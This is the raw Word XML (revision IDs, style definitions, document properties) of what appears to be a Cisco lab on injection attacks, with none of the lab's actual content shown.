    <w:rsid w:val="00D12640"/>
    <w:rsid w:val="00D139C8"/>
    <w:rsid w:val="00D163BF"/>
    <w:rsid w:val="00D17F81"/>
    <w:rsid w:val="00D22893"/>
    <w:rsid w:val="00D22A6C"/>
    <w:rsid w:val="00D25C50"/>
    <w:rsid w:val="00D2758C"/>
    <w:rsid w:val="00D275CA"/>
    <w:rsid w:val="00D2789B"/>
    <w:rsid w:val="00D3380D"/>
    <w:rsid w:val="00D33EC1"/>
    <w:rsid w:val="00D345AB"/>
    <w:rsid w:val="00D366E4"/>
    <w:rsid w:val="00D41566"/>
    <w:rsid w:val="00D423FE"/>
    <w:rsid w:val="00D452F4"/>
    <w:rsid w:val="00D458EC"/>
    <w:rsid w:val="00D501B0"/>
    <w:rsid w:val="00D50241"/>
    <w:rsid w:val="00D52582"/>
    <w:rsid w:val="00D531D0"/>
    <w:rsid w:val="00D53FF1"/>
    <w:rsid w:val="00D56A0E"/>
    <w:rsid w:val="00D57AD3"/>
    <w:rsid w:val="00D62770"/>
    <w:rsid w:val="00D62F25"/>
    <w:rsid w:val="00D635FE"/>
    <w:rsid w:val="00D65B2A"/>
    <w:rsid w:val="00D66A7B"/>
    <w:rsid w:val="00D67E1D"/>
    <w:rsid w:val="00D729DE"/>
    <w:rsid w:val="00D736FF"/>
    <w:rsid w:val="00D75B6A"/>
    <w:rsid w:val="00D77658"/>
    <w:rsid w:val="00D778DF"/>
    <w:rsid w:val="00D826B5"/>
    <w:rsid w:val="00D84BDA"/>
    <w:rsid w:val="00D8503E"/>
    <w:rsid w:val="00D85325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2A05"/>
    <w:rsid w:val="00DB3763"/>
    <w:rsid w:val="00DB4029"/>
    <w:rsid w:val="00DB4978"/>
    <w:rsid w:val="00DB5F4D"/>
    <w:rsid w:val="00DB66F2"/>
    <w:rsid w:val="00DB6DA5"/>
    <w:rsid w:val="00DC076B"/>
    <w:rsid w:val="00DC08C3"/>
    <w:rsid w:val="00DC186F"/>
    <w:rsid w:val="00DC252F"/>
    <w:rsid w:val="00DC6050"/>
    <w:rsid w:val="00DC6445"/>
    <w:rsid w:val="00DD15B4"/>
    <w:rsid w:val="00DD35E1"/>
    <w:rsid w:val="00DD43EA"/>
    <w:rsid w:val="00DD547E"/>
    <w:rsid w:val="00DE3DE1"/>
    <w:rsid w:val="00DE5EB7"/>
    <w:rsid w:val="00DE6F44"/>
    <w:rsid w:val="00DE77F2"/>
    <w:rsid w:val="00DF1B58"/>
    <w:rsid w:val="00E009DA"/>
    <w:rsid w:val="00E037D9"/>
    <w:rsid w:val="00E04927"/>
    <w:rsid w:val="00E049C4"/>
    <w:rsid w:val="00E0525A"/>
    <w:rsid w:val="00E05EB4"/>
    <w:rsid w:val="00E06D2A"/>
    <w:rsid w:val="00E075A3"/>
    <w:rsid w:val="00E11A48"/>
    <w:rsid w:val="00E12679"/>
    <w:rsid w:val="00E130EB"/>
    <w:rsid w:val="00E162CD"/>
    <w:rsid w:val="00E17FA5"/>
    <w:rsid w:val="00E21BFE"/>
    <w:rsid w:val="00E21C88"/>
    <w:rsid w:val="00E223AC"/>
    <w:rsid w:val="00E23EB5"/>
    <w:rsid w:val="00E26930"/>
    <w:rsid w:val="00E27257"/>
    <w:rsid w:val="00E27F4F"/>
    <w:rsid w:val="00E317A5"/>
    <w:rsid w:val="00E33C65"/>
    <w:rsid w:val="00E4090A"/>
    <w:rsid w:val="00E449D0"/>
    <w:rsid w:val="00E44A34"/>
    <w:rsid w:val="00E4506A"/>
    <w:rsid w:val="00E53F99"/>
    <w:rsid w:val="00E56510"/>
    <w:rsid w:val="00E56AC9"/>
    <w:rsid w:val="00E621CE"/>
    <w:rsid w:val="00E62EA8"/>
    <w:rsid w:val="00E65C87"/>
    <w:rsid w:val="00E66A8A"/>
    <w:rsid w:val="00E67A6E"/>
    <w:rsid w:val="00E70096"/>
    <w:rsid w:val="00E71B43"/>
    <w:rsid w:val="00E75E88"/>
    <w:rsid w:val="00E81612"/>
    <w:rsid w:val="00E82BD7"/>
    <w:rsid w:val="00E8306D"/>
    <w:rsid w:val="00E85406"/>
    <w:rsid w:val="00E859E3"/>
    <w:rsid w:val="00E85B25"/>
    <w:rsid w:val="00E87D18"/>
    <w:rsid w:val="00E87D62"/>
    <w:rsid w:val="00E90597"/>
    <w:rsid w:val="00E91B9A"/>
    <w:rsid w:val="00E9515A"/>
    <w:rsid w:val="00E97333"/>
    <w:rsid w:val="00EA486E"/>
    <w:rsid w:val="00EA4FA3"/>
    <w:rsid w:val="00EB001B"/>
    <w:rsid w:val="00EB3082"/>
    <w:rsid w:val="00EB3354"/>
    <w:rsid w:val="00EB6C33"/>
    <w:rsid w:val="00EC1DEA"/>
    <w:rsid w:val="00EC211D"/>
    <w:rsid w:val="00EC6F62"/>
    <w:rsid w:val="00ED2EA2"/>
    <w:rsid w:val="00ED6019"/>
    <w:rsid w:val="00ED7830"/>
    <w:rsid w:val="00EE00D9"/>
    <w:rsid w:val="00EE2BFF"/>
    <w:rsid w:val="00EE3909"/>
    <w:rsid w:val="00EE6C17"/>
    <w:rsid w:val="00EF2627"/>
    <w:rsid w:val="00EF4205"/>
    <w:rsid w:val="00EF48C9"/>
    <w:rsid w:val="00EF5939"/>
    <w:rsid w:val="00F00341"/>
    <w:rsid w:val="00F0070F"/>
    <w:rsid w:val="00F01714"/>
    <w:rsid w:val="00F01A62"/>
    <w:rsid w:val="00F0258F"/>
    <w:rsid w:val="00F02D06"/>
    <w:rsid w:val="00F056E5"/>
    <w:rsid w:val="00F06FDD"/>
    <w:rsid w:val="00F10819"/>
    <w:rsid w:val="00F11219"/>
    <w:rsid w:val="00F113D3"/>
    <w:rsid w:val="00F14148"/>
    <w:rsid w:val="00F16F35"/>
    <w:rsid w:val="00F170B7"/>
    <w:rsid w:val="00F17559"/>
    <w:rsid w:val="00F2229D"/>
    <w:rsid w:val="00F25ABB"/>
    <w:rsid w:val="00F266F0"/>
    <w:rsid w:val="00F26F62"/>
    <w:rsid w:val="00F27963"/>
    <w:rsid w:val="00F30103"/>
    <w:rsid w:val="00F30446"/>
    <w:rsid w:val="00F3557C"/>
    <w:rsid w:val="00F3640F"/>
    <w:rsid w:val="00F4135D"/>
    <w:rsid w:val="00F41F1B"/>
    <w:rsid w:val="00F44E73"/>
    <w:rsid w:val="00F46BD9"/>
    <w:rsid w:val="00F47AC8"/>
    <w:rsid w:val="00F50DA2"/>
    <w:rsid w:val="00F60BE0"/>
    <w:rsid w:val="00F6280E"/>
    <w:rsid w:val="00F63CF5"/>
    <w:rsid w:val="00F666EC"/>
    <w:rsid w:val="00F67134"/>
    <w:rsid w:val="00F7050A"/>
    <w:rsid w:val="00F75533"/>
    <w:rsid w:val="00F8036D"/>
    <w:rsid w:val="00F809DC"/>
    <w:rsid w:val="00F8121D"/>
    <w:rsid w:val="00F8304D"/>
    <w:rsid w:val="00F8578A"/>
    <w:rsid w:val="00F86456"/>
    <w:rsid w:val="00F86EB0"/>
    <w:rsid w:val="00FA154B"/>
    <w:rsid w:val="00FA3811"/>
    <w:rsid w:val="00FA3B9F"/>
    <w:rsid w:val="00FA3F06"/>
    <w:rsid w:val="00FA4A26"/>
    <w:rsid w:val="00FA7084"/>
    <w:rsid w:val="00FA7BEF"/>
    <w:rsid w:val="00FB0FBA"/>
    <w:rsid w:val="00FB1105"/>
    <w:rsid w:val="00FB1929"/>
    <w:rsid w:val="00FB5FD9"/>
    <w:rsid w:val="00FB60D3"/>
    <w:rsid w:val="00FB6713"/>
    <w:rsid w:val="00FB7FFE"/>
    <w:rsid w:val="00FC31ED"/>
    <w:rsid w:val="00FD1398"/>
    <w:rsid w:val="00FD33AB"/>
    <w:rsid w:val="00FD3BA4"/>
    <w:rsid w:val="00FD4070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  <w:rsid w:val="019D3F56"/>
    <w:rsid w:val="01FF7C9A"/>
    <w:rsid w:val="07AF24CD"/>
    <w:rsid w:val="0C11DFB6"/>
    <w:rsid w:val="0EDA78B6"/>
    <w:rsid w:val="106BF32C"/>
    <w:rsid w:val="128D5B4D"/>
    <w:rsid w:val="12D813B8"/>
    <w:rsid w:val="1384AA15"/>
    <w:rsid w:val="17FBBE7B"/>
    <w:rsid w:val="18EECAAE"/>
    <w:rsid w:val="192C6AA7"/>
    <w:rsid w:val="1D735069"/>
    <w:rsid w:val="1F50B322"/>
    <w:rsid w:val="22868D7C"/>
    <w:rsid w:val="2371DF9A"/>
    <w:rsid w:val="23F840A8"/>
    <w:rsid w:val="24D05F98"/>
    <w:rsid w:val="277031A4"/>
    <w:rsid w:val="2D80584C"/>
    <w:rsid w:val="2DB146B6"/>
    <w:rsid w:val="2DC972F4"/>
    <w:rsid w:val="2E0100E0"/>
    <w:rsid w:val="317DFC2F"/>
    <w:rsid w:val="35C499D8"/>
    <w:rsid w:val="36D6C01C"/>
    <w:rsid w:val="3F0C64BB"/>
    <w:rsid w:val="42BB228B"/>
    <w:rsid w:val="44F4ED72"/>
    <w:rsid w:val="45D8A383"/>
    <w:rsid w:val="4914D7CC"/>
    <w:rsid w:val="49628494"/>
    <w:rsid w:val="4AA4E646"/>
    <w:rsid w:val="4AC247AB"/>
    <w:rsid w:val="4C4DA683"/>
    <w:rsid w:val="4EE49CD2"/>
    <w:rsid w:val="538332AD"/>
    <w:rsid w:val="544408DE"/>
    <w:rsid w:val="58E6CDF5"/>
    <w:rsid w:val="5AF3877F"/>
    <w:rsid w:val="5C2F77B8"/>
    <w:rsid w:val="5CA474AF"/>
    <w:rsid w:val="5E5E5C0A"/>
    <w:rsid w:val="5FA153EA"/>
    <w:rsid w:val="63820AA6"/>
    <w:rsid w:val="651F09F7"/>
    <w:rsid w:val="67AB4ACF"/>
    <w:rsid w:val="6826C78F"/>
    <w:rsid w:val="68B4A1CC"/>
    <w:rsid w:val="6AB7DFE7"/>
    <w:rsid w:val="75CF2799"/>
    <w:rsid w:val="78F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1DE9D5"/>
  <w15:docId w15:val="{8CFC7285-257F-44A7-9521-2C719E33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B780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BB7804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BB7804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BB7804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BB7804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7804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7804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7804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7804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7804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780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BB7804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BB7804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BB7804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BB780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BB7804"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BB7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80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BB7804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B780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804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BB7804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BB7804"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00BB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BB780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BB7804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BB7804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BB7804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BB780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BB7804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BB7804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BB7804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BB7804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BB7804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BB780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BB780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78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780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BB7804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BB7804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BB7804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BB780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BB7804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BB7804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BB7804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BB7804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BB7804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BB7804"/>
    <w:rPr>
      <w:color w:val="EE0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="BodyTextL25Bold">
    <w:name w:val="Body Text L25 Bold"/>
    <w:basedOn w:val="BodyTextL25"/>
    <w:qFormat/>
    <w:rsid w:val="00BB780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B7804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BB780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F77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804"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ReflectionQ">
    <w:name w:val="Reflection Q"/>
    <w:basedOn w:val="BodyTextL25"/>
    <w:qFormat/>
    <w:rsid w:val="00BB7804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BB7804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BB7804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B780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B780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B7804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B7804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B7804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BB7804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BB7804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7804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BB7804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804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BB7804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BB7804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BB7804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BB7804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BB7804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BB7804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BB7804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BB7804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BB7804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BB7804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BB78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BB7804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BB7804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BB7804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BB7804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BB7804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BB7804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BB7804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BB7804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B7804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B7804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B7804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B7804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B7804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BB7804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BB7804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BB7804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BB7804"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CMDChar">
    <w:name w:val="CMD Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CMD"/>
    <w:rsid w:val="00BB7804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BB7804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BB7804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B7804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BB7804"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CMDRed">
    <w:name w:val="CMD Red"/>
    <w:basedOn w:val="CMD"/>
    <w:link w:val="CMDRedChar"/>
    <w:qFormat/>
    <w:rsid w:val="00BB7804"/>
    <w:rPr>
      <w:color w:val="EE0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CMDRedChar">
    <w:name w:val="CMD Red Char"/>
    <w:basedOn w:val="CMDChar"/>
    <w:link w:val="CMDRed"/>
    <w:rsid w:val="00BB7804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BB7804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BB7804"/>
    <w:rPr>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CMDOutputChar">
    <w:name w:val="CMD Output Char"/>
    <w:basedOn w:val="BodyTextL25Char"/>
    <w:link w:val="CMDOutput"/>
    <w:rsid w:val="00BB7804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BB7804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BB7804"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableAnswer">
    <w:name w:val="Table Answer"/>
    <w:basedOn w:val="TableText"/>
    <w:qFormat/>
    <w:rsid w:val="00BB7804"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2GrayDnT">
    <w:name w:val="Heading 2 Gray DnT"/>
    <w:basedOn w:val="Heading2Char"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00BB7804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BB7804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BB7804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BB7804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BB7804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BB7804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BB7804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BB7804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BB7804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BB7804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BB7804"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FB6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0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5D87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4B38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crackstation.ne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.6.6.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97B707046445088B2ABE892006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05A3-6029-47F0-B0D4-3188AD10B703}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00E91663" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="5397B707046445088B2ABE892006ADFD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7"/>
    <w:rsid w:val="000A43C7"/>
    <w:rsid w:val="000B1A2B"/>
    <w:rsid w:val="001B1FB8"/>
    <w:rsid w:val="00270E33"/>
    <w:rsid w:val="00273AC9"/>
    <w:rsid w:val="00672D45"/>
    <w:rsid w:val="006F09DB"/>
    <w:rsid w:val="007B15DB"/>
    <w:rsid w:val="008B249D"/>
    <w:rsid w:val="00AA4061"/>
    <w:rsid w:val="00AC2B1F"/>
    <w:rsid w:val="00C11D9D"/>
    <w:rsid w:val="00D173FF"/>
    <w:rsid w:val="00E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7B707046445088B2ABE892006ADFD">
    <w:name w:val="5397B707046445088B2ABE892006A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3EC5-4E42-49D1-B4C9-4B78D528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4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4</Pages>
  <Words>941</Words>
  <Characters>5370</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>44</Lines>
  <Paragraphs>12</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Cisco Systems, Inc.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Injection Attacks</dc:title>
  <dc:description>2023</dc:description>
  <cp:lastModifiedBy>Олександра Покотило</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-05T09:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-05T09:53:00Z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